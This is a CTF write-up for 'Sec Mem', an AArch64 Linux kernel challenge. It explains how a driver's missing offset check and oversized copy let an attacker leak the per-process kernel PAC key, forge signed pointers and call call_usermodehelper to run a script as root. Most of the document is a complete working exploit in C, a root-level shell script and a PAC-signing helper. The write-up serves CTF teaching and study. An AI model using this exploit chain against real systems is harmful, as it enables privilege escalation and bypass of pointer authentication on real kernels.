MCTF 2025 - Write-up Sec Mem - Pwn
Write-up - Sec Mem
This is the write-up for the challenge Sec Mem which is an AARCH64 pwn kernel challenge I created for midnight flag CTF 2025 quals. It involves bypassing PAC in the Linux kernel.
Description
During your quest, you come across a machine containing a mysterious device that is probably being used to store information. Try to abuse it to increase your privileges and find the secret hidden in the root directory.
Solution
We have the code for this challenge, a kernel and the file system associated. This is a kernel challenge so we have a user account in the VM and we need to get root to read the flag.
A vulnerable driver is present and is needed to be exploited, we have the source code of it.
This is the important function of the driver :
static long sec_mem_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
if (cmd == sec_mem_IOC_SET_OPERATION) {
if (copy_from_user(&data, (struct sec_mem_ioctl_data *)arg, sizeof(data))) {
return -EFAULT;
}
if (data.op_index >= 3) {
return -EINVAL;
}
void *auth_ptr = autiza(device_global_struct.ops[data.op_index]);
if (!auth_ptr) {
return -EACCES;
}
buffer_op_fn op = (buffer_op_fn)auth_ptr;
ssize_t result = op(device_global_struct.buffer, &data.buffer, data.length, data.offset);
if (result < 0) {
return result;
}
if (copy_to_user(arg, &data, sizeof(data))){
return -EFAULT;
}
return 0;
}
return -EINVAL;
}
This function handle ioctl calls applied on the driver (which expose a file in /dev/sec_mem
). First it copies user buffer which is the structure sec_mem_ioctl_data
(if the ioctl command is sec_mem_IOC_SET_OPERATION
):
// #define BUFFER_SIZE 1024
struct sec_mem_ioctl_data {
size_t length;
uint64_t op_index;
char buffer[BUFFER_SIZE];
int64_t offset;
};
Then it checks op_index
value which is the id of the function which is going to be called. It uses autiza
function to perform operation on the callback pointer :
void *auth_ptr = autiza(device_global_struct.ops[data.op_index]);
The ops
variable is initialised in this function (at each open
call of the device) :
static void sec_mem_init_ops(void) {
device_global_struct.ops[0] = buffer_copy_from_user;
device_global_struct.ops[1] = buffer_copy_to_user;
device_global_struct.ops[2] = buffer_clear;
for (int i = 0; i < 3; i++) {
device_global_struct.ops[i] = paciza(device_global_struct.ops[i]);
}
}
There are 3 callback functions (which are used to store, read and clear a global buffer stored in the .bss of the driver : struct sec_mem_buffer
) and the function pointers are modified by paciza
function.
struct sec_mem_buffer {
char buffer[BUFFER_SIZE];
buffer_op_fn ops[3];
};
Vulnerabilities
Arbitrary read
The first vulnerability is an arbitrary read primitive in buffer_copy_to_user
function :
ssize_t buffer_copy_to_user(void *buffer, const void *data, size_t len, int64_t offset) {
if (len > sizeof(struct sec_mem_buffer)) {
return -EINVAL;
}
memcpy(data, buffer + offset, len);
return len;
}
There is len and offset fields which are provided by user and data buffer which is copied to userland buffer after the call. There is no check with offset field so we can memcpy arbitrary kernel memory to our userland buffer. The offset is relative to device_global_struct.buffer
, we first need to leak it to know which value we need to set in offset. To leak it we can put offset to 1024, the size of the global buffer and leak the ops
function pointers, they are in the .text
section of the driver so we can compute the buffer address with one of them.
Partial overwrite, arbitrary call (But no…)
In the other function :
ssize_t buffer_copy_from_user(void *buffer, const void *data, size_t len, int64_t offset) {
if (len > sizeof(struct sec_mem_buffer)) {
return -EINVAL;
}
memcpy(buffer, data, len);
return len;
}
We can copy data from userland to the global buffer of the driver, the length must not be bigger than the structure sec_mem_buffer
, and offset field is not used. The vulnerability is the check, which should restrict the length to the buffer length, not the structure. With this we can overwrite the function pointers ops
of the driver.
And the next calls we do are going to call our arbitrary function.
But the challenge will be too easy if there are no protections.
Let’s review autiza
and paciza
functions :
static void *paciza(void *ptr) {
__asm__ volatile (
"paciza %0"
: "+r" (ptr)
);
return ptr;
}
static void *autiza(void *ptr) {
__asm__ volatile (
"autiza %0"
: "+r" (ptr)
);
return ptr;
}
They apply paciza and autiza instruction on the ops pointer. Those two instructions are related to PAC security feature. PAC stands for Pointer Authentication Code, and its goal is to protect pointers and data to be modified by an attack with signature and authentication processes.
I already did a challenge which used PAC in the past : pacapable.
PAC works with three parameters :
- the pointer to sign/authenticate
- a modifier (context) (could be null)
- a key related to PAC instruction (A or B) (there are multiple for different usages)
The signature is stored on the upper bits of the address when the signature instruction is executed. The signature is removed if the authentication instruction success. Here is a schema :
The modifier field could be a stack pointer value for example (with paciasp
instruction), there are multiple variants of PAC instructions to set modifier as we want, use the key we want.
The signature is basically a hash.
The program is using paciza and autiza which sign with a null modifier. Even if the modifier is null, we don’t know the A key used by the kernel.
Could we use our arbitrary read primitive to leak the A key used by the kernel ?
PAC implementation in the Linux Kernel
To understand the implementation of PAC in the Linux Kernel we could use Elixir bootlin which allow us to navigate and search in the kernel source code.
The interesting PAC code is in this file : https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/include/asm/pointer_auth.h#L53
There is a structure which stores the A key in kernel if CONFIG_ARM64_PTR_AUTH_KERNEL
is defined. Here is a part of the code :
#define __ptrauth_key_install_nosync(k, v) \
do { \
struct ptrauth_key __pki_v = (v); \
write_sysreg_s(__pki_v.lo, SYS_ ## k ## KEYLO_EL1); \
write_sysreg_s(__pki_v.hi, SYS_ ## k ## KEYHI_EL1); \
} while (0)
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
struct ptrauth_keys_kernel {
struct ptrauth_key apia;
};
static __always_inline void ptrauth_keys_init_kernel(struct ptrauth_keys_kernel *keys)
{
if (system_supports_address_auth())
get_random_bytes(&keys->apia, sizeof(keys->apia));
}
static __always_inline void ptrauth_keys_switch_kernel(struct ptrauth_keys_kernel *keys)
{
if (!system_supports_address_auth())
return;
__ptrauth_key_install_nosync(APIA, keys->apia);
isb();
}
// [...]
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
#define ptrauth_thread_init_kernel(tsk) \
ptrauth_keys_init_kernel(&(tsk)->thread.keys_kernel)
#define ptrauth_thread_switch_kernel(tsk) \
ptrauth_keys_switch_kernel(&(tsk)->thread.keys_kernel)
The kernel support only the use of A key (not the case for userland processes which used different and more keys). The key is initialised with random_bytes.
By analysing the code, we could see A key is initialised with ptrauth_thread_init_kernel
which is called when a new process is created : https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/kernel/process.c#L419 .
So every process has his own PAC keys for their kernel task, which is of type struct task_struct
. The key is stored on the thread struct which is in the task_struct : https://elixir.bootlin.com/linux/v6.13.7/source/include/linux/sched.h#L1614 and https://elixir.bootlin.com/linux/v6.13.7/source/arch/arm64/include/asm/processor.h#L178.
struct thread_struct {
// [...]
#ifdef CONFIG_ARM64_PTR_AUTH
struct ptrauth_keys_user keys_user;
#ifdef CONFIG_ARM64_PTR_AUTH_KERNEL
struct ptrauth_keys_kernel keys_kernel;
Current A PAC key in use by the CPU is stored in APIAKEYLO_EL1 and APIAKEYHI_EL1 CPU registers.
Abuse read primitive to leak PAC key
What we can do now is to use our read primitive to cross all the kernel tasks in the kernel, found the one related to our process which communicates with the driver. When we found the task_struct
we can leak the A PAC key of the context kernel for our process.
With this we can forge arbitrary PAC signed pointers for the context and get a valid signature.
First, we need to leak a pointer of the driver to know the address of the global buffer (to know the right offset value because buffer_copy_to_user call is related to this address).
ioctl_data.op_index = 1;
ioctl_data.offset = 1024;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer;
printf("[+] Leak function copy from user [PACed] : %llx\n",
leak_cpy_from_user);
leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer | 0xffff000000000000;
printf("[+] Leak function copy from user : %llx\n", leak_cpy_from_user);
uint64_t buffer_base_addr = leak_cpy_from_user + 0x2588;
printf("[+] buffer_base_addr : %llx\n", buffer_base_addr);
Then we can do a function to arbitrary read memory in the kernel by using buffer_base_addr
as a base.
void arb_read(uint64_t buffer_base_addr, uint64_t target_addr, char *res_buf) {
struct sec_mem_ioctl_data ioctl_data;
ioctl_data.op_index = 1;
//printf("[+] Read @ : %llx // buffer_base_addr : %llx\n",
// target_addr,buffer_base_addr);
ioctl_data.offset = target_addr - buffer_base_addr;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
}
memcpy(res_buf, ioctl_data.buffer, 512);
ioctl_data.op_index = 2;
ioctl_data.offset = 0;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for buffer clear");
close(fd);
}
memset(ioctl_data.buffer, 0, BUFFER_SIZE);
}
We need to leak kernel base (because of KASLR), there was a pointer of __start_init_stack
near after the buffer. ksymaddr-remote
command of the incredible gef fork from bata24 is really helpful to get the symbols of the kernel.
ioctl_data.op_index = 1;
ioctl_data.offset = 1024 + 0x0050;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak = *(uint64_t *)ioctl_data.buffer; // __start_init_stack+0x994e8
printf("[+] Leak ptr kernel .text : %llx\n", leak);
uint64_t kbase = leak - 0xb894e8;
printf("[+] kbase : %llx\n", kbase);
Then, we could cross all the tasks, by starting with the init_task
(which is the first kernel task of the task linked list). Gef bata24 plugin allows easy to get the offset from kbase of this symbol and their fields :
gef> ktask
[+] Wait for memory scan
[+] init_task: 0xffff800080b119c0
[+] offsetof(task_struct, tasks): 0x338
[+] Number of tasks: 41
[+] offsetof(task_struct, mm): 0x388
[+] offsetof(task_struct, stack): 0x20
[+] offsetof(task_struct, pid): 0x408
[+] offsetof(task_struct, stack_canary): 0x410
[+] offsetof(task_struct, comm): 0x5e8
[+] offsetof(task_struct, cred): 0x5e0
[+] offsetof(cred, uid): 0x4
We search our process name in comm
field (in our case user
is our exploit process name) :
uint64_t init_task = kbase + 0xb019c0;
uint64_t curr_task = init_task;
char *leak_buf;
uint64_t process_task_struct = 0;
printf("[+] search process task_struct\n");
while (1) {
arb_read(buffer_base_addr, curr_task + 0x5e8, leak_buf);
if (!memcmp(leak_buf, "user", 5)) {
printf("[+] found process task_struct @ %llx \n", curr_task);
break;
}
arb_read(buffer_base_addr, curr_task + 0x338, leak_buf);
curr_task = *(uint64_t *)leak_buf - 0x338;
// printf("[+] curr_task : %llx\n", curr_task);
}
Next we could leak the A PAC key (which is split in two 64 bits fields) :
arb_read(buffer_base_addr, curr_task + 0xf28, leak_buf);
apiakey_pac_low = *(uint64_t *)leak_buf;
arb_read(buffer_base_addr, curr_task + 0xf30, leak_buf);
apiakey_pac_high = *(uint64_t *)leak_buf;
printf("[+] Leak PAC keys of ktask : High : %llx & Low : %llx\n",
apiakey_pac_high, apiakey_pac_low);
Now we have the keys we need to forge pointers with them like QEMU emulation does. (reproduce the paciza instruction)
We could refer to QEMU source code : https://github.com/qemu/qemu/blob/b876e721f1c939f3e83ac85bd3c1c2821e12b3fa/target/arm/tcg/pauth_helper.c#L327 , with some adjustments to compile it in our program.
// in pauth_auth
bot_bit = 64 - param.tsz;
top_bit = 64 - 8 * param.tbi;
By some tests, tsz is equal to 0 and tbi to 2, they definied which bits to sign. The first 2 bytes are not signed because the signature is stored on them.
see header file at the end for the full implmentation
We then could compute an arbitrary signed pointer which could be called by the driver in our context.
To verify it we could try to sign our leaked function pointer (buffer_copy_from_user
) and check the signature if it’s the same with our leaked keys
key.lo = apiakey_pac_low;
key.hi = apiakey_pac_high;
ptr = leak_cpy_from_user;
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] Checking keys by signing first leaded pointer : 0x%llx\n", r);
And it works :)
We now have an arbitrary call primitive. First I tried to use run_cmd
command which takes string parameters as a userland binary to call but I didn’t find the function in the symbols (I don’t know actually why). So I decided to use the sub function of it : call_usermodehelper
: https://elixir.bootlin.com/linux/v6.12.9/source/kernel/reboot.c#L840 , which allows to call userland binary as root.
We control the arguments, the two firsts are pointers where we control the values pointed.
op(device_global_struct.buffer, &data.buffer, data.length, data.offset);
We can’t set argv to NULL by analysing the kernel code of usermodehelper.
ptr = kbase + 0x00045a2c; // call_usermodehelper
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] prepare to call : %llx\n",ptr);
memset(&ioctl_data,0, sizeof(ioctl_data));
ioctl_data.length = sizeof(struct sec_mem_ioctl_data);
ioctl_data.op_index = 0;
memset(ioctl_data.buffer, 0, 1024);
strcpy(ioctl_data.buffer,"/tmp/get_root");
ioctl_data.offset = r;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_from_user");
close(fd);
return 1;
}
// trigger
memset(&ioctl_data,0, sizeof(ioctl_data));
*(uint64_t*) ioctl_data.buffer = buffer_base_addr; // set argv
ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data);
We use the write command with ioctl to overwrite the buffer_copy_from_user
address (ioctl_data.offset = r;
).
We also write the argv[0]
parameter as our userland binary name (/tmp/get_root
).
Finally we trigger call_usermodehelper
call by using the read command (which call our overwrited pointer).
get_root
script :
#!/bin/sh
/bin/busybox touch /tmp/pwn
/bin/busybox cat /root/flag.txt > /tmp/flag
Full exploit
user.c :
#include "../solve/pauth_helper.h"
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>
#define DEVICE_NAME "/dev/sec_mem"
#define sec_mem_IOC_MAGIC 'k'
#define sec_mem_IOC_SET_OPERATION _IOW(sec_mem_IOC_MAGIC, 3, unsigned int)
#define BUFFER_SIZE 1024
int fd;
struct sec_mem_ioctl_data {
size_t length;
uint64_t op_index;
char buffer[BUFFER_SIZE];
int64_t offset;
};
void arb_read(uint64_t buffer_base_addr, uint64_t target_addr, char *res_buf) {
struct sec_mem_ioctl_data ioctl_data;
ioctl_data.op_index = 1;
//printf("[+] Read @ : %llx // buffer_base_addr : %llx\n",
// target_addr,buffer_base_addr);
ioctl_data.offset = target_addr - buffer_base_addr;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
}
memcpy(res_buf, ioctl_data.buffer, 512);
ioctl_data.op_index = 2;
ioctl_data.offset = 0;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for buffer clear");
close(fd);
}
memset(ioctl_data.buffer, 0, BUFFER_SIZE);
}
int op_index = 0;
uint64_t ptr = 0;
int64_t modifier = 0;
struct ARMPACKey key;
uint64_t r = 0;
int main() {
struct sec_mem_ioctl_data ioctl_data;
uint64_t apiakey_pac_high = 0;
uint64_t apiakey_pac_low = 0;
fd = open(DEVICE_NAME, O_RDWR);
if (fd == -1) {
perror("Failed to open device");
return 1;
}
ioctl_data.op_index = 1;
ioctl_data.offset = 1024;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer;
printf("[+] Leak function copy from user [PACed] : %llx\n",
leak_cpy_from_user);
leak_cpy_from_user = *(uint64_t *)ioctl_data.buffer | 0xffff000000000000;
printf("[+] Leak function copy from user : %llx\n", leak_cpy_from_user);
uint64_t buffer_base_addr = leak_cpy_from_user + 0x2588;
printf("[+] buffer_base_addr : %llx\n", buffer_base_addr);
ioctl_data.op_index = 1;
ioctl_data.offset = 1024 + 0x0050;
ioctl_data.length = 24;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_to_user");
close(fd);
return 1;
}
uint64_t leak = *(uint64_t *)ioctl_data.buffer; // __start_init_stack+0x994e8
printf("[+] Leak ptr kernel .text : %llx\n", leak);
uint64_t kbase = leak - 0xb894e8;
printf("[+] kbase : %llx\n", kbase);
/* ktask
gef> ktask
[+] Wait for memory scan
[+] init_task: 0xffff800080b119c0
[+] offsetof(task_struct, tasks): 0x338
[+] Number of tasks: 41
[+] offsetof(task_struct, mm): 0x388
[+] offsetof(task_struct, stack): 0x20
[+] offsetof(task_struct, pid): 0x408
[+] offsetof(task_struct, stack_canary): 0x410
[+] offsetof(task_struct, comm): 0x5e8
[+] offsetof(task_struct, cred): 0x5e0
[+] offsetof(cred, uid): 0x4
*/
uint64_t init_task = kbase + 0xb019c0;
uint64_t curr_task = init_task;
char *leak_buf;
uint64_t process_task_struct = 0;
printf("[+] search process task_struct\n");
while (1) {
arb_read(buffer_base_addr, curr_task + 0x5e8, leak_buf);
if (!memcmp(leak_buf, "user", 5)) {
printf("[+] found process task_struct @ %llx \n", curr_task);
break;
}
arb_read(buffer_base_addr, curr_task + 0x338, leak_buf);
curr_task = *(uint64_t *)leak_buf - 0x338;
// printf("[+] curr_task : %llx\n", curr_task);
}
// APIAKEY : curr_task+0x0f28
arb_read(buffer_base_addr, curr_task + 0xf28, leak_buf);
apiakey_pac_low = *(uint64_t *)leak_buf;
arb_read(buffer_base_addr, curr_task + 0xf30, leak_buf);
apiakey_pac_high = *(uint64_t *)leak_buf;
printf("[+] Leak PAC keys of ktask : High : %llx & Low : %llx\n",
apiakey_pac_high, apiakey_pac_low);
key.lo = apiakey_pac_low;
key.hi = apiakey_pac_high;
ptr = leak_cpy_from_user;
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] Checking keys by signing first leaded pointer : 0x%llx\n", r);
ptr = kbase + 0x00045a2c; // call_usermodehelper
r = pauth_addpac(0, ptr, modifier, &key, 0);
printf("[+] prepare to call : %llx\n",ptr);
memset(&ioctl_data,0, sizeof(ioctl_data));
ioctl_data.length = sizeof(struct sec_mem_ioctl_data);
ioctl_data.op_index = 0;
memset(ioctl_data.buffer, 0, 1024);
strcpy(ioctl_data.buffer,"/tmp/get_root");
ioctl_data.offset = r;
if (ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data) == -1) {
perror("IOCTL failed for copy_from_user");
close(fd);
return 1;
}
// trigger
memset(&ioctl_data,0, sizeof(ioctl_data));
*(uint64_t*) ioctl_data.buffer = buffer_base_addr; // set argv
ioctl(fd, sec_mem_IOC_SET_OPERATION, &ioctl_data);
close(fd);
exit(0);
}
pauth_helper.h
/*
* ARM v8.3-PAuth Operations
*
* Copyright (c) 2019 Linaro, Ltd.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/
/*
#include "qemu/osdep.h"
#include "cpu.h"
#include "internals.h"
#include "cpu-features.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "exec/helper-proto.h"
#include "tcg/tcg-gvec-desc.h"
#include "qemu/xxhash.h"
*/
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <assert.h>
typedef struct ARMPACKey {
uint64_t lo, hi;
} ARMPACKey;
typedef uint64_t * CPUARMState;
#define MAKE_64BIT_MASK(shift, length) \
(((~0ULL) >> (64 - (length))) << (shift))
static inline uint64_t extract64(uint64_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 64 - start);
return (value >> start) & (~0ULL >> (64 - length));
}
static inline uint32_t extract32(uint32_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 32 - start);
return (value >> start) & (~0U >> (32 - length));
}
static uint64_t pac_cell_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 52, 4);
o |= extract64(i, 24, 4) << 4;
o |= extract64(i, 44, 4) << 8;
o |= extract64(i, 0, 4) << 12;
o |= extract64(i, 28, 4) << 16;
o |= extract64(i, 48, 4) << 20;
o |= extract64(i, 4, 4) << 24;
o |= extract64(i, 40, 4) << 28;
o |= extract64(i, 32, 4) << 32;
o |= extract64(i, 12, 4) << 36;
o |= extract64(i, 56, 4) << 40;
o |= extract64(i, 20, 4) << 44;
o |= extract64(i, 8, 4) << 48;
o |= extract64(i, 36, 4) << 52;
o |= extract64(i, 16, 4) << 56;
o |= extract64(i, 60, 4) << 60;
return o;
}
static uint64_t pac_cell_inv_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 12, 4);
o |= extract64(i, 24, 4) << 4;
o |= extract64(i, 48, 4) << 8;
o |= extract64(i, 36, 4) << 12;
o |= extract64(i, 56, 4) << 16;
o |= extract64(i, 44, 4) << 20;
o |= extract64(i, 4, 4) << 24;
o |= extract64(i, 16, 4) << 28;
o |= i & MAKE_64BIT_MASK(32, 4);
o |= extract64(i, 52, 4) << 36;
o |= extract64(i, 28, 4) << 40;
o |= extract64(i, 8, 4) << 44;
o |= extract64(i, 20, 4) << 48;
o |= extract64(i, 0, 4) << 52;
o |= extract64(i, 40, 4) << 56;
o |= i & MAKE_64BIT_MASK(60, 4);
return o;
}
static uint64_t pac_sub(uint64_t i)
{
static const uint8_t sub[16] = {
0xb, 0x6, 0x8, 0xf, 0xc, 0x0, 0x9, 0xe,
0x3, 0x7, 0x4, 0x5, 0xd, 0x2, 0x1, 0xa,
};
uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)sub[(i >> b) & 0xf] << b;
}
return o;
}
static uint64_t pac_sub1(uint64_t i)
{
static const uint8_t sub1[16] = {
0xa, 0xd, 0xe, 0x6, 0xf, 0x7, 0x3, 0x5,
0x9, 0x8, 0x0, 0xc, 0xb, 0x1, 0x2, 0x4,
};
uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)sub1[(i >> b) & 0xf] << b;
}
return o;
}
static uint64_t pac_inv_sub(uint64_t i)
{
static const uint8_t inv_sub[16] = {
0x5, 0xe, 0xd, 0x8, 0xa, 0xb, 0x1, 0x9,
0x2, 0x6, 0xf, 0x0, 0x4, 0xc, 0x7, 0x3,
};
uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)inv_sub[(i >> b) & 0xf] << b;
}
return o;
}
static int rot_cell(int cell, int n)
{
/* 4-bit rotate left by n. */
cell |= cell << 4;
return extract32(cell, 4 - n, 4);
}
static uint64_t pac_mult(uint64_t i)
{
uint64_t o = 0;
int b;
for (b = 0; b < 4 * 4; b += 4) {
int i0, i4, i8, ic, t0, t1, t2, t3;
i0 = extract64(i, b, 4);
i4 = extract64(i, b + 4 * 4, 4);
i8 = extract64(i, b + 8 * 4, 4);
ic = extract64(i, b + 12 * 4, 4);
t0 = rot_cell(i8, 1) ^ rot_cell(i4, 2) ^ rot_cell(i0, 1);
t1 = rot_cell(ic, 1) ^ rot_cell(i4, 1) ^ rot_cell(i0, 2);
t2 = rot_cell(ic, 2) ^ rot_cell(i8, 1) ^ rot_cell(i0, 1);
t3 = rot_cell(ic, 1) ^ rot_cell(i8, 2) ^ rot_cell(i4, 1);
o |= (uint64_t)t3 << b;
o |= (uint64_t)t2 << (b + 4 * 4);
o |= (uint64_t)t1 << (b + 8 * 4);
o |= (uint64_t)t0 << (b + 12 * 4);
}
return o;
}
static uint64_t tweak_cell_rot(uint64_t cell)
{
return (cell >> 1) | (((cell ^ (cell >> 1)) & 1) << 3);
}
static uint64_t tweak_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 16, 4) << 0;
o |= extract64(i, 20, 4) << 4;
o |= tweak_cell_rot(extract64(i, 24, 4)) << 8;
o |= extract64(i, 28, 4) << 12;
o |= tweak_cell_rot(extract64(i, 44, 4)) << 16;
o |= extract64(i, 8, 4) << 20;
o |= extract64(i, 12, 4) << 24;
o |= tweak_cell_rot(extract64(i, 32, 4)) << 28;
o |= extract64(i, 48, 4) << 32;
o |= extract64(i, 52, 4) << 36;
o |= extract64(i, 56, 4) << 40;
o |= tweak_cell_rot(extract64(i, 60, 4)) << 44;
o |= tweak_cell_rot(extract64(i, 0, 4)) << 48;
o |= extract64(i, 4, 4) << 52;
o |= tweak_cell_rot(extract64(i, 40, 4)) << 56;
o |= tweak_cell_rot(extract64(i, 36, 4)) << 60;
return o;
}
static uint64_t tweak_cell_inv_rot(uint64_t cell)
{
return ((cell << 1) & 0xf) | ((cell & 1) ^ (cell >> 3));
}
static uint64_t tweak_inv_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= tweak_cell_inv_rot(extract64(i, 48, 4));
o |= extract64(i, 52, 4) << 4;
o |= extract64(i, 20, 4) << 8;
o |= extract64(i, 24, 4) << 12;
o |= extract64(i, 0, 4) << 16;
o |= extract64(i, 4, 4) << 20;
o |= tweak_cell_inv_rot(extract64(i, 8, 4)) << 24;
o |= extract64(i, 12, 4) << 28;
o |= tweak_cell_inv_rot(extract64(i, 28, 4)) << 32;
o |= tweak_cell_inv_rot(extract64(i, 60, 4)) << 36;
o |= tweak_cell_inv_rot(extract64(i, 56, 4)) << 40;
o |= tweak_cell_inv_rot(extract64(i, 16, 4)) << 44;
o |= extract64(i, 32, 4) << 48;
o |= extract64(i, 36, 4) << 52;
o |= extract64(i, 40, 4) << 56;
o |= tweak_cell_inv_rot(extract64(i, 44, 4)) << 60;
return o;
}
static uint64_t pauth_computepac_architected(uint64_t data, uint64_t modifier,
ARMPACKey key, bool isqarma3)
{
static const uint64_t RC[5] = {
0x0000000000000000ull,
0x13198A2E03707344ull,
0xA4093822299F31D0ull,
0x082EFA98EC4E6C89ull,
0x452821E638D01377ull,
};
const uint64_t alpha = 0xC0AC29B7C97C50DDull;
int iterations = isqarma3 ? 2 : 4;
/*
* Note that in the ARM pseudocode, key0 contains bits <127:64>
* and key1 contains bits <63:0> of the 128-bit key.
*/
uint64_t key0 = key.hi, key1 = key.lo;
uint64_t workingval, runningmod, roundkey, modk0;
int i;
modk0 = (key0 << 63) | ((key0 >> 1) ^ (key0 >> 63));
runningmod = modifier;
workingval = data ^ key0;
for (i = 0; i <= iterations; ++i) {
roundkey = key1 ^ runningmod;
workingval ^= roundkey;
workingval ^= RC[i];
if (i > 0) {
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
}
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_sub(workingval);
}
runningmod = tweak_shuffle(runningmod);
}
roundkey = modk0 ^ runningmod;
workingval ^= roundkey;
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_sub(workingval);
}
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
workingval ^= key1;
workingval = pac_cell_inv_shuffle(workingval);
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_inv_sub(workingval);
}
workingval = pac_mult(workingval);
workingval = pac_cell_inv_shuffle(workingval);
workingval ^= key0;
workingval ^= runningmod;
for (i = 0; i <= iterations; ++i) {
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_inv_sub(workingval);
}
if (i < iterations) {
workingval = pac_mult(workingval);
workingval = pac_cell_inv_shuffle(workingval);
}
runningmod = tweak_inv_shuffle(runningmod);
roundkey = key1 ^ runningmod;
workingval ^= RC[iterations - i];
workingval ^= roundkey;
workingval ^= alpha;
}
workingval ^= modk0;
return workingval;
}
static inline int64_t sextract64(uint64_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 64 - start);
/* Note that this implementation relies on right shift of signed
* integers being an arithmetic shift.
*/
return ((int64_t)(value << (64 - length - start))) >> (64 - length);
}
/*
static uint64_t pauth_computepac_impdef(uint64_t data, uint64_t modifier,
ARMPACKey key)
{
return qemu_xxhash64_4(data, modifier, key.lo, key.hi);
}
*/
static uint64_t pauth_computepac(CPUARMState *env, uint64_t data,
uint64_t modifier, ARMPACKey key)
{
// if (cpu_isar_feature(aa64_pauth_qarma5, env_archcpu(env))) {
return pauth_computepac_architected(data, modifier, key, false);
// } else if (cpu_isar_feature(aa64_pauth_qarma3, env_archcpu(env))) {
// return pauth_computepac_architected(data, modifier, key, true);
// } else {
// return pauth_computepac_impdef(data, modifier, key);
// }
}
static inline uint64_t deposit64(uint64_t value, int start, int length,
uint64_t fieldval)
{
uint64_t mask;
assert(start >= 0 && length > 0 && length <= 64 - start);
mask = (~0ULL >> (64 - length)) << start;
return (value & ~mask) | ((fieldval << start) & mask);
}
static uint64_t pauth_addpac(CPUARMState *env, uint64_t ptr, uint64_t modifier,
ARMPACKey *key, bool data)
{
uint64_t pac, ext_ptr, ext, test;
int bot_bit, top_bit;
ext = sextract64(ptr, 63, 1);
top_bit = 64 ;
bot_bit = 64 - 16;
ext_ptr = deposit64(ptr, bot_bit, top_bit - bot_bit, ext);
pac = pauth_computepac(env, ext_ptr, modifier, *key);
test = sextract64(ptr, bot_bit, top_bit - bot_bit);
if (test != 0 && test != -1) {
pac ^= MAKE_64BIT_MASK(top_bit - 2, 1);
}
pac ^= ptr;
ptr &= MAKE_64BIT_MASK(0, bot_bit);
pac &= ~(MAKE_64BIT_MASK(55, 1) | MAKE_64BIT_MASK(0, bot_bit));
ext &= MAKE_64BIT_MASK(55, 1);
return pac | ext | ptr;
}